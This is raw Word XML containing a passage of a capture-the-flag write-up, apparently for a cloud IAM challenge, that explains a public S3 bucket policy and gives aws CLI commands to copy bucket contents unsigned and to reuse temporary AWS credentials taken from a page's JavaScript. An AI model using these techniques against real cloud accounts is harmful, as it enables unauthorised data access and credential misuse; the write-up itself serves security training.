          <w:b w:val="tru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 xml:space="preserve">The AWS S3 bucket policy consists of two main statements. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Medium" w:eastAsia="Barlow Medium" w:hAnsi="Barlow Medium" w:cs="Barlow Medium"/>
          <w:strike w:val="false"/>
          <w:u w:val="none"/>
          <w:spacing w:val="0"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:i w:val="false"/>
          <w:shd w:fill="auto" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>The first statement implies that the policy allows anyone (Principal: *) to access (read) any object stored in the S3 bucket. There is no restriction on who can download the objects, meaning the contents of this bucket are publicly accessible to the internet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Medium" w:eastAsia="Barlow Medium" w:hAnsi="Barlow Medium" w:cs="Barlow Medium"/>
          <w:strike w:val="false"/>
          <w:u w:val="none"/>
          <w:spacing w:val="0"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:i w:val="false"/>
          <w:shd w:fill="auto" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>The second statement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows any user (Principal: *) to list the contents of the bucket, but only objects under the files/ prefix can be listed. Additionally, this listing permission is restricted to the IAM user admin (via their ARN)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Regular" w:eastAsia="Barlow Regular" w:hAnsi="Barlow Regular" w:cs="Barlow Regular"/>
          <w:strike w:val="false"/>
          <w:u w:val="none"/>
          <w:spacing w:val="0"/>
          <w:b w:val="true"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:i w:val="false"/>
          <w:shd w:fill="auto" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>WHAT ARE THE SECURITY RISKS OF THE POLICY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:spacing w:after="0" w:before="240"/>
        <w:ind w:hanging="360" w:left="72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 xml:space="preserve"> The first statement allows anyone to download objects from the bucket, which could expose sensitive or confidential information to unauthorized users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:spacing w:after="0" w:before="240"/>
        <w:ind w:hanging="360" w:left="72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While the listing permission is restricted to the admin user through conditions, the use of Principal: * can be misleading or risky. If the condition is not enforced as intended, other users might gain access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:before="240"/>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Regular" w:eastAsia="Barlow Regular" w:hAnsi="Barlow Regular" w:cs="Barlow Regular"/>
          <w:strike w:val="false"/>
          <w:u w:val="none"/>
          <w:spacing w:val="0"/>
          <w:b w:val="true"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:i w:val="false"/>
          <w:shd w:fill="auto" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>EXPLOITING THE FLAW</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Regular" w:eastAsia="Barlow Regular" w:hAnsi="Barlow Regular" w:cs="Barlow Regular"/>
          <w:strike w:val="false"/>
          <w:u w:val="none"/>
          <w:spacing w:val="0"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:i w:val="false"/>
          <w:shd w:fill="auto" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>To exploit the flaw in this policy, we would rely on enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:before="240"/>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We can try to download the content of the bucket, but it says forbidden,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:before="240"/>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702463"/>
            <wp:docPr id="14"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9">
                      <a:alphaModFix amt="100000"/>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="702463"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Medium" w:eastAsia="Barlow Medium" w:hAnsi="Barlow Medium" w:cs="Barlow Medium"/>
          <w:strike w:val="false"/>
          <w:u w:val="none"/>
          <w:spacing w:val="0"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:i w:val="false"/>
          <w:shd w:fill="auto" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">How about we tweak the command to also </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Medium" w:eastAsia="Barlow Medium" w:hAnsi="Barlow Medium" w:cs="Barlow Medium"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>copy all files and subdirectories within the specified S3 prefix (files/) and disable the requirement to sign the request with AWS credentials. (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Medium" w:eastAsia="Barlow Medium" w:hAnsi="Barlow Medium" w:cs="Barlow Medium"/>
          <w:strike w:val="false"/>
          <w:u w:val="none"/>
          <w:spacing w:val="0"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:i w:val="false"/>
          <w:shd w:fill="auto" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>--recursive, --no-sign-request respectively)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:before="24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aws s3 cp s3://thebigiamchallenge-admin-storage-abf1321/files . --recursive --no-sign-request</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:before="24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943600" cy="1065019"/>
            <wp:docPr id="15"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0">
                      <a:alphaModFix amt="100000"/>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1065019"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">From the response of the command, we already have an idea of the files present in the  bucket. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Now can attempt to view the content of the file using the command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Medium" w:eastAsia="Barlow Medium" w:hAnsi="Barlow Medium" w:cs="Barlow Medium"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>aws s3 cp s3://thebigiamchallenge-admin-storage-abf1321/files/flag-as-admin.txt -</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distR="0" distB="0" distL="0">
            <wp:extent cx="5943600" cy="558084"/>
            <wp:docPr id="16"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1">
                      <a:alphaModFix amt="100000"/>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="558084"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="true"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CHALLENGE 5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distR="0" distB="0" distL="0">
            <wp:extent cx="4684077" cy="6199513"/>
            <wp:docPr id="17"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2">
                      <a:alphaModFix amt="100000"/>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4684077" cy="6199513"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">We can then inspect the page to check for hidden clues. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Medium" w:eastAsia="Barlow Medium" w:hAnsi="Barlow Medium" w:cs="Barlow Medium"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>From the Javascript script tag we know that the aws.config.credential is a very interesting variable to check further.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distR="0" distB="0" distL="0">
            <wp:extent cx="5943600" cy="1625126"/>
            <wp:docPr id="18"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3">
                      <a:alphaModFix amt="100000"/>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1625126"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="720" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">We can access the AWS.config.credentials via the Developer Console. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distR="0" distB="0" distL="0">
            <wp:extent cx="5943600" cy="4172708"/>
            <wp:docPr id="19"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xsi:nil="true"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24">
                      <a:alphaModFix amt="100000"/>
                    </a:blip>
                    <a:srcRect l="160" r="-160" t="0" b="0"/>
                    <a:stretch xsi:nil="true"/>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4172708"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Monospace Regular" w:eastAsia="Monospace Regular" w:hAnsi="Monospace Regular" w:cs="Monospace Regular"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Medium" w:eastAsia="Barlow Medium" w:hAnsi="Barlow Medium" w:cs="Barlow Medium"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Medium" w:eastAsia="Barlow Medium" w:hAnsi="Barlow Medium" w:cs="Barlow Medium"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>On your local machine, run the command to export the access keyid, token and secret access key</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Medium" w:eastAsia="Barlow Medium" w:hAnsi="Barlow Medium" w:cs="Barlow Medium"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Medium" w:eastAsia="Barlow Medium" w:hAnsi="Barlow Medium" w:cs="Barlow Medium"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>export AWS_ACCESS_KEY_ID=""</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Medium" w:eastAsia="Barlow Medium" w:hAnsi="Barlow Medium" w:cs="Barlow Medium"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>export AWS_SECRET_ACCESS_KEY=""</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Medium" w:eastAsia="Barlow Medium" w:hAnsi="Barlow Medium" w:cs="Barlow Medium"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>export AWS_SESSION_TOKEN=""</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Medium" w:eastAsia="Barlow Medium" w:hAnsi="Barlow Medium" w:cs="Barlow Medium"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Medium" w:eastAsia="Barlow Medium" w:hAnsi="Barlow Medium" w:cs="Barlow Medium"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Medium" w:eastAsia="Barlow Medium" w:hAnsi="Barlow Medium" w:cs="Barlow Medium"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Now you can list the content of the privatefiles</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distR="0" distB="0" distL="0">
            <wp:extent cx="5943600" cy="923730"/>
            <wp:docPr id="20" name="Drawing 19" descr=""/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 19" descr=""/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="true"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25">
                      <a:alphaModFix amt="100000"/>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="923730"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>To download the content of flag1.txt to the current working directory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:before="240"/>
        <w:ind w:hanging="0" w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Medium" w:eastAsia="Barlow Medium" w:hAnsi="Barlow Medium" w:cs="Barlow Medium"/>
          <w:strike w:val="false"/>
          <w:u w:val="none"/>
          <w:spacing w:val="0"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:i w:val="false"/>
          <w:shd w:fill="auto" w:val="clear" w:color="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Medium" w:eastAsia="Barlow Medium" w:hAnsi="Barlow Medium" w:cs="Barlow Medium"/>
          <w:strike w:val="false"/>
          <w:u w:val="none"/>
          <w:spacing w:val="0"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:i w:val="false"/>
          <w:shd w:fill="auto" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>aws s3 cp s3://wiz-privatefiles/flag1.txt .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:before="240"/>
        <w:ind w:hanging="0" w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Medium" w:eastAsia="Barlow Medium" w:hAnsi="Barlow Medium" w:cs="Barlow Medium"/>
          <w:strike w:val="false"/>
          <w:u w:val="none"/>
          <w:spacing w:val="0"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:i w:val="false"/>
          <w:shd w:fill="auto" w:val="clear" w:color="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distR="0" distB="0" distL="0">
            <wp:extent cx="5067300" cy="657225"/>
            <wp:docPr id="21" name="Drawing 20" descr=""/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 20" descr=""/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="true"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26">
                      <a:alphaModFix amt="100000"/>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5067300" cy="657225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:before="240"/>
        <w:ind w:hanging="0" w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Medium" w:eastAsia="Barlow Medium" w:hAnsi="Barlow Medium" w:cs="Barlow Medium"/>
          <w:strike w:val="false"/>
          <w:u w:val="none"/>
          <w:spacing w:val="0"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:i w:val="false"/>
          <w:shd w:fill="auto" w:val="clear" w:color="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:hanging="0" w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Medium" w:eastAsia="Barlow Medium" w:hAnsi="Barlow Medium" w:cs="Barlow Medium"/>
          <w:strike w:val="false"/>
          <w:u w:val="none"/>
          <w:spacing w:val="0"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:i w:val="false"/>
          <w:shd w:fill="auto" w:val="clear" w:color="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId27" w:type="default"/>
      <w:footerReference r:id="rId28"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bb26975-40ac-45bd-b4a7-95a17ab141bb" w:fontKey="{00000000-0000-0000-0000-000000000000}" w:subsetted="0"/>
  </w:font>
  <w:font w:name="Barlow Bold">
    <w:embedBold r:id="rId043af4f0-9a70-4a64-bf72-04865b83319b" w:fontKey="{00000000-0000-0000-0000-000000000000}" w:subsetted="0"/>
  </w:font>
  <w:font w:name="Barlow Medium">
    <w:embedRegular r:id="rIdedec1b44-d5c5-477d-a10c-5368479eb876" w:fontKey="{00000000-0000-0000-0000-000000000000}" w:subsetted="0"/>
  </w:font>
  <w:font w:name="Barlow Regular">
    <w:embedRegular r:id="rId0f4ae1a4-29fa-44b0-96f3-8d104d34d67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196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4464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73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636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19615"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="944646"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="177309"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="77636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media/image11.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId17" Target="media/image12.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId18" Target="media/image13.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId19" Target="media/image14.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId2" Target="styles.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles"/><Relationship Id="rId20" Target="media/image15.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId21" Target="media/image16.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId22" Target="media/image17.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId23" Target="media/image18.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId24" Target="media/image19.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId25" Target="media/image20.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId26" Target="media/image21.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId27" Target="header1.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header"/><Relationship Id="rId28" Target="footer1.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer"/><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043af4f0-9a70-4a64-bf72-04865b83319b" Target="fonts/barlowbold.ttf" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font"/><Relationship Id="rId0f4ae1a4-29fa-44b0-96f3-8d104d34d671" Target="fonts/barlowregular.ttf" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font"/><Relationship Id="rId7bb26975-40ac-45bd-b4a7-95a17ab141bb" Target="fonts/robotoregular.ttf" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font"/><Relationship Id="rIdedec1b44-d5c5-477d-a10c-5368479eb876" Target="fonts/barlowmediumregular.ttf" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font"/></Relationships>
</file>

<file path=word/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
